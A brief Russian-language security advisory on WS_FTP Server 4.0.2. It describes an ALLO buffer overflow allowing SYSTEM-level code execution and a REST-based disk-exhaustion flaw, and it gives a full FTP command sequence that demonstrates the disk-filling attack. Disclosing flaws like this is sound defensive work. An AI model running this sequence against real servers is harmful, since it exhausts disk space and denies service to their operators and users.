Программа: WS_FTP Server 4.0.2 

Переполнение буфера обнаружено в WS_FTP Server в обработке ALLO команды. Удаленный авторизованный пользователь с привилегиями загрузки, может выполнить произвольный код с SYSTEM привилегиями.
WS_FTP Server ALLO обработчик не проверяет строку ошибки, посланную обратно клиенту. В результате сервер может возвратить 64 битное значение, которое равно общему размеру всех файлов в FTP каталоге удаленного пользователя, вместо кодированного значения. Удаленный пользователь может установить размер своего дерева каталога к значению примерно 256 байт, чтобы перезаписать адрес возврата и выполнить произвольный код с SYSTEM привилегиями.

 

Кроме того удаленный авторизованный пользователь с доступом на
запись может заставить целевую службу использовать все доступное дисковое пространство.
Удаленный авторизованный пользователь может послать REST команду с чрезмерно длинным значением и послать маленький файл с командой STOP, чтобы создать файл на целевой системе размером 2^64-1 байт. 

Пример: 

open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit

Оставить мнение